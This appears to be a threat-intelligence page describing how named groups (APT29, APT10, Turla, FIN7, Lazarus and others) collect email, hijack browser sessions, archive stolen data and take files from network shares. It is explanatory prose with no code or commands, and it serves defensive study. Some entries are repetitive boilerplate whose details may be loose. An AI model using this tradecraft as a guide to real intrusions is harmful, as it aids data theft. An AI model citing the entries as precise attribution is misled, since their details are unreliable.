ATMitch (Carbanak/GCMAN): ATMitch is malware used by the Carbanak and GCMAN groups to target ATMs and banking systems. The malware is designed to interact with the removable drives used to update ATM software. When an infected removable drive is connected, the malware automatically copies sensitive configuration files and logs from the ATM system. These files are then encrypted and transferred to the attackers. By targeting removable media, ATMitch ensures that it can capture data from isolated ATM systems that do not have direct network connections to external systems, making it a potent tool for financial cybercrime.
Email Collection: Remote Email Collection
UNC3524: UNC3524 is a sophisticated cyber-espionage group known for targeting high-value individuals and organizations. They utilize Exchange Web Services (EWS) API requests to remotely collect email data. This method involves making structured API requests to extract emails and attachments from targeted Exchange servers. They authenticate using various credentials, including compromised accounts and ApplicationImpersonation rights, which allow them to access mailboxes without detection. The collected data is specifically chosen from executive teams and employees involved in significant corporate activities, often spanning specific date ranges. UNC3524 operates from devices often overlooked in security monitoring, such as older Linux versions and network appliances. This advanced operational security ensures that their activities blend in with expected network traffic, avoiding detection.
APT29: APT29, also known as Cozy Bear, is a Russian cyber-espionage group linked to high-profile attacks. They have been known to deploy phishing campaigns to compromise email accounts, subsequently using the compromised accounts to collect email data remotely. For example, they have used phishing emails masquerading as official communications from the U.S. Department of State. These emails contain links to malicious files that deliver backdoors like the Cobalt Strike Beacon. Once the backdoor is installed, it provides remote access to the compromised systems, allowing APT29 to collect and exfiltrate email data. Their phishing emails often exploit compromised infrastructure, such as hijacked email servers, to make the attacks appear legitimate.
APT10: APT10, a Chinese state-sponsored group, has conducted extensive cyber-espionage campaigns targeting various sectors worldwide. They utilize the A41APT campaign to exploit vulnerabilities in Pulse Connect Secure, gaining access to VPN sessions and leveraging stolen credentials. Once inside, they employ the Ecipekac loader to deliver multiple stages of malware. These stages include tools that can access email servers and extract email data remotely. APT10's multi-layered approach involves decrypting and executing payloads in memory, which allows them to remain undetected while accessing sensitive email communications from targeted organizations.
APT35: APT35, also known as Charming Kitten, is an Iranian cyber-espionage group that frequently targets individuals in academia, human rights, and media. They use spear-phishing emails to gain initial access to victims' email accounts. These emails often impersonate well-known researchers or journalists, inviting recipients to events or to review documents. Upon clicking the links, victims are redirected to decoy websites that harvest their credentials. The collected email credentials are then used to remotely access and download email data from the victims' accounts, facilitating espionage activities. This method allows APT35 to gather intelligence and sensitive information without raising immediate suspicion.
TA410: TA410 is an advanced threat group targeting the U.S. utilities sector using sophisticated phishing tactics. Their campaigns, such as those involving LookBack and FlowCloud malware, begin with phishing emails that appear legitimate, often impersonating reputable organizations. The emails contain malicious attachments that, when opened, deliver malware capable of remote access. This access is used to collect email data from the targeted systems, including communications and attachments. The malware features a modular architecture, enabling various functionalities like keylogging and data exfiltration, ensuring comprehensive email collection and espionage capabilities.
APT34: APT34, an Iranian cyber-espionage group, uses social engineering and phishing to compromise targets' email accounts. They deliver malware through spear-phishing emails and social media platforms, often engaging in conversations to lure targets into downloading malicious documents. Once the targets' email accounts are compromised, APT34 deploys tools like TONEDEAF and LONGWATCH to collect email data remotely. These tools extract system information and login credentials, allowing the group to access and exfiltrate email communications from the compromised accounts. APT34's use of trusted relationships and sophisticated malware ensures effective and covert email collection.
Browser Session Hijacking
Turla (Snake): Turla, also known as Snake, is a Russian cyber-espionage group known for targeting government and military organizations. They have developed a sophisticated browser session hijacking technique to intercept and manipulate web sessions. Turla's malware injects itself into the browser process, allowing it to capture cookies and session tokens. This enables the attackers to hijack active sessions without needing the user's credentials. The malware operates stealthily by using encrypted communication channels to send the captured data to the command and control (C2) servers. By maintaining access to these sessions, Turla can continuously monitor and exfiltrate sensitive information from the target's browser activity. This method is highly effective in bypassing traditional security measures and maintaining long-term access to compromised systems.
APT28 (Fancy Bear): APT28, also known as Fancy Bear, is another Russian state-sponsored group that has used browser session hijacking to gather intelligence. Their malware toolkit includes capabilities to hook into browser processes and capture session cookies and authentication tokens. This allows them to hijack sessions on platforms like webmail and social media. The malware also intercepts SSL/TLS traffic, giving attackers access to encrypted communications. APT28 leverages these capabilities to perform man-in-the-middle attacks, redirecting traffic through their own servers to capture sensitive data. This technique helps them to remain undetected while exfiltrating valuable information over extended periods.
APT33: APT33, an Iranian threat group, has targeted various industries using browser session hijacking techniques. They deploy malware that hooks into the browser and captures session cookies and tokens. This allows them to gain access to authenticated web sessions, bypassing the need for login credentials. The captured data is then used to perform further attacks, such as stealing information from web-based email services or enterprise applications. The malware also includes mechanisms to avoid detection, such as encrypted communication with C2 servers and hiding its presence on the infected system. This persistent access enables APT33 to conduct prolonged espionage campaigns.
FIN7 (Carbanak Group): FIN7, also known as the Carbanak Group, has incorporated browser session hijacking into their arsenal to facilitate financial theft and corporate espionage. Their malware hooks into web browsers to capture session tokens and cookies, which are then used to hijack online banking sessions. This enables FIN7 to conduct fraudulent transactions without triggering security alerts that typically require re-authentication. The group also uses this technique to access and exfiltrate sensitive corporate data from web-based applications. Their sophisticated malware includes features for evading detection, such as encrypting traffic and using legitimate software for payload delivery.
APT41: APT41, a Chinese cyber-espionage group, has used browser session hijacking to gather intelligence and steal data. They deploy malware that integrates with browser processes to capture session tokens and cookies, allowing them to take over authenticated sessions. This technique is used to access email accounts, social media platforms, and enterprise applications. APT41's malware also includes capabilities to intercept and decrypt SSL/TLS traffic, providing access to secure communications. The group uses these hijacked sessions to conduct targeted attacks, exfiltrating valuable data and monitoring ongoing communications.
OceanLotus (APT32): OceanLotus, also known as APT32, is a Vietnamese cyber-espionage group that has utilized browser session hijacking to target foreign governments and corporations. Their malware hooks into browser processes to capture session tokens and cookies, which are then used to hijack web sessions. This allows them to gain access to email accounts, social media, and other web-based services without needing the user's credentials. The captured session data is transmitted to their C2 servers using encrypted channels, ensuring stealthy communication. OceanLotus leverages this access to conduct espionage operations, collecting sensitive information over extended periods .
Archive Collected Data: Archive via Library
Turla (Snake): Turla, also known as Snake, is a Russian cyber-espionage group targeting government and military organizations. They have used the Crutch backdoor to exfiltrate data by archiving collected data using the WinRAR utility. The malware automatically compresses targeted files into encrypted RAR archives. These archives are then uploaded to Dropbox, leveraging legitimate cloud storage services for data exfiltration. The use of Dropbox not only ensures reliable file transfer but also helps in evading traditional network monitoring tools. Crutch persists on the system through DLL hijacking, making it difficult to detect. This method allows Turla to maintain long-term access and control over compromised systems while securely exfiltrating sensitive data .
APT28 (Fancy Bear): APT28, also known as Fancy Bear, is a Russian cyber-espionage group that has targeted various sectors, including government and military organizations. They have utilized the Sofacy malware to collect and archive data. The malware uses the 7-Zip library to compress collected files into encrypted archives. These archives are then staged for exfiltration via various protocols, including FTP and HTTP. The use of the 7-Zip library allows for the compression and encryption of data, which aids in reducing the file size and securing the contents. This technique helps APT28 in efficiently managing large volumes of data and ensuring that the exfiltrated information remains protected during transit .
Lazarus Group: The Lazarus Group, linked to North Korea, is known for its diverse cyber-espionage and financial crime activities. They employ the AppleJeus malware to collect data from compromised cryptocurrency exchanges. The malware uses a custom archiving library to compress collected data into encrypted archives. These archives are then exfiltrated to command and control (C2) servers. The use of custom archiving ensures that the data is securely packaged and reduces the risk of detection during transfer. This method allows the Lazarus Group to efficiently steal large volumes of sensitive financial information from their targets .
FIN6 (Magecart Group 6): FIN6, associated with Magecart, targets e-commerce platforms to steal credit card information. They use JavaScript skimmers to collect payment data, which is then archived using custom libraries within the malicious script. The skimmer code compresses the stolen data and encrypts it before exfiltration. This approach ensures that the captured data is secure and less likely to be detected by security measures. The archived data is then sent to remote servers controlled by FIN6, where it can be decrypted and used for fraudulent activities. This method highlights FIN6's focus on maintaining the confidentiality and integrity of the stolen data during the exfiltration process .
APT32 (OceanLotus): OceanLotus, a Vietnamese cyber-espionage group, targets government agencies and private sector organizations. They utilize a backdoor that collects sensitive data and archives it using a custom compression library. The archived data is encrypted and stored in a hidden directory on the infected system. Periodically, the malware exfiltrates these encrypted archives to C2 servers via HTTPS. The use of a custom compression library and encryption ensures that the data remains secure and compressed, facilitating efficient and stealthy exfiltration. This technique allows APT32 to conduct long-term espionage operations while minimizing the risk of data interception .
APT41: APT41, a Chinese state-sponsored group, conducts both cyber-espionage and financially motivated attacks. They employ the ShadowPad malware, which includes a module for archiving collected data. ShadowPad compresses and encrypts the data using the zlib library before exfiltration. The use of zlib allows for efficient compression, reducing the size of the data and making it easier to transfer. The encrypted archives are then sent to C2 servers over secure channels, such as HTTPS. This method ensures that the exfiltrated data remains secure and less detectable during transmission, enabling APT41 to conduct extensive data theft operations .
Data from Network Shared Drive
Turla (Snake): Turla, also known as Snake, is a Russian cyber-espionage group targeting government and military organizations. They use the Crutch backdoor to exfiltrate data, which involves accessing network shared drives to collect sensitive documents. The Crutch malware scans these drives for valuable files, copying them to a local staging area on the compromised system. The collected data is then archived using WinRAR, creating encrypted files that are exfiltrated to Dropbox. This technique allows Turla to leverage legitimate cloud storage services to move large volumes of data out of secure networks. By hiding within normal network traffic and using standard tools like WinRAR, Turla's activities often evade detection. The collected data includes documents, images, and other critical information needed for their espionage operations .
APT10 (Stone Panda): APT10, also known as Stone Panda, is a Chinese cyber-espionage group that targets various sectors, including technology and government. They employ techniques to access and exfiltrate data from network shared drives using tools like Trochilus and UPPERCUT malware. These tools perform directory listings on network shares, identifying and copying files of interest. The collected data is then compressed using WinRAR and transferred to command and control (C2) servers via cURL. This method allows APT10 to efficiently gather and move large amounts of data while minimizing the chances of detection. The use of legitimate tools and standard protocols helps them blend into normal network traffic, maintaining a low profile during their operations .
APT29 (Cozy Bear): APT29, also known as Cozy Bear, is a Russian state-sponsored group that has targeted government and private sector organizations. They utilize malware to access network shared drives and collect sensitive data. The malware scans these drives for files matching specific criteria, such as document types and file sizes. Once identified, the files are copied to a staging area, compressed, and encrypted using tools like 7-Zip or WinRAR. The compressed archives are then exfiltrated to remote servers under the attackers' control. This approach allows APT29 to collect significant amounts of data while maintaining a covert presence on the network. The use of encryption ensures that the exfiltrated data remains secure during transit .
Lazarus Group: Lazarus Group, linked to North Korea, targets various industries including finance and media. They use malware to access network shared drives, performing directory listings to identify valuable files. The collected files are staged and compressed into encrypted archives using WinRAR or custom compression tools. These archives are then exfiltrated using HTTP or HTTPS to compromised legitimate websites serving as C2 servers. This method allows Lazarus Group to efficiently move large volumes of data out of secure environments while minimizing the risk of detection. The use of legitimate web protocols and cloud services further obscures their activities, making it challenging for defenders to identify and block the exfiltration .
FIN7 (Carbanak Group): FIN7, also known as the Carbanak Group, is a financially motivated cybercrime organization that targets retail, hospitality, and financial sectors. They access network shared drives to collect payment card data and other financial information. The collected data is compressed using 7-Zip or similar utilities and encrypted before being exfiltrated. FIN7 often uses custom scripts to automate the collection and compression of data, ensuring a streamlined and efficient process. The encrypted archives are transferred to remote servers controlled by the group, often using legitimate communication channels to avoid detection. This method allows FIN7 to steal large amounts of sensitive financial data while remaining undetected by standard security measures .
APT32 (OceanLotus): APT32, also known as OceanLotus, is a Vietnamese cyber-espionage group targeting government and private sector organizations. They use malware to access network shared drives, searching for files containing sensitive information. The identified files are copied, compressed using tools like WinRAR, and encrypted to ensure security during transit. The compressed and encrypted archives are then exfiltrated to C2 servers via HTTPS, leveraging legitimate network traffic to avoid detection. This approach allows APT32 to gather significant amounts of intelligence without raising immediate suspicion. The use of encryption and standard network protocols helps protect the exfiltrated data and maintain the group's covert presence on the network .
Email Collection: Local Email Collection
APT33: APT33, an Iranian threat group, has been documented targeting various sectors, including aviation and energy. They deploy a specialized malware known as "TurnedUp" to collect email data locally from infected systems. This malware infiltrates email clients like Microsoft Outlook and exfiltrates emails directly from the local email client storage. The collected email data is then compressed and encrypted before being sent to the attackers' command and control (C2) servers. This process ensures the secure transfer of sensitive information without immediate detection. APT33's focus on collecting locally stored email data allows them to access detailed communication records, including attachments and metadata. The group's sophisticated techniques highlight their ability to infiltrate and extract data from high-value targets efficiently .
APT34: Also known as OilRig, APT34 is an Iranian cyber-espionage group that targets financial, energy, telecommunications, and critical infrastructure sectors. They use a tool called "VALUEVAULT" to extract email credentials and email content from local email clients. VALUEVAULT leverages PowerShell scripts to access the Windows Vault and browser histories, where email credentials and related data are often stored. The collected email data is stored in a SQLite database file, which is then exfiltrated manually by the attackers. This approach ensures that APT34 can access a wide range of email data, including sensitive corporate communications and login details. The manual retrieval of the data indicates a careful and controlled exfiltration process, minimizing the risk of detection.
APT28 (Fancy Bear): APT28, a Russian state-sponsored group, employs malware like Sofacy and X-Agent to collect local email data from compromised systems. These malware variants are capable of accessing email clients such as Microsoft Outlook and Mozilla Thunderbird, extracting stored emails and attachments. The malware compresses and encrypts the collected data before transmitting it to remote C2 servers. APT28's ability to capture and exfiltrate emails provides them with valuable intelligence, particularly when targeting government and military entities. This technique allows them to gather comprehensive communication records, aiding in their espionage objectives. Their methodical approach to email collection demonstrates their focus on maintaining long-term access and undetected data extraction .
APT10 (Stone Panda): APT10, a Chinese cyber-espionage group, uses tools like "ChChes" to collect emails locally from infected devices. The malware specifically targets local email client storage, such as PST files used by Microsoft Outlook. By accessing these files, APT10 can extract a complete archive of the victim's email communications. The collected emails are then compressed and encrypted, ensuring secure transmission to the attackers' C2 infrastructure. APT10's focus on local email collection allows them to gather detailed and historical communication data, which is crucial for their espionage activities. This method provides them with a rich source of intelligence from targeted organizations, including valuable attachments and metadata .
FIN7 (Carbanak Group): FIN7, also known as the Carbanak Group, is primarily financially motivated and targets retail, hospitality, and financial sectors. They use the "Carbanak" backdoor to infiltrate systems and collect local email data. This backdoor accesses email clients and extracts stored emails and attachments, which are then archived and encrypted. The malware's ability to capture detailed email records, including transaction information and internal communications, aids FIN7 in executing sophisticated financial fraud schemes. By targeting local email storage, FIN7 can gather comprehensive data that supports their criminal activities, ensuring they have all necessary information for subsequent fraudulent actions .
APT32 (OceanLotus): OceanLotus, a Vietnamese cyber-espionage group, targets government agencies and private sector organizations in Southeast Asia. They deploy malware that specifically targets local email clients to extract stored emails and attachments. The malware collects email data from clients like Microsoft Outlook and compresses it into encrypted archives for exfiltration. This method allows APT32 to gather extensive communication data, including sensitive information from targeted individuals and organizations. The focus on local email collection ensures that APT32 can access detailed and often historical email records, providing valuable intelligence for their espionage efforts. The use of encryption and secure transmission channels helps them avoid detection during the data exfiltration process.
Last updated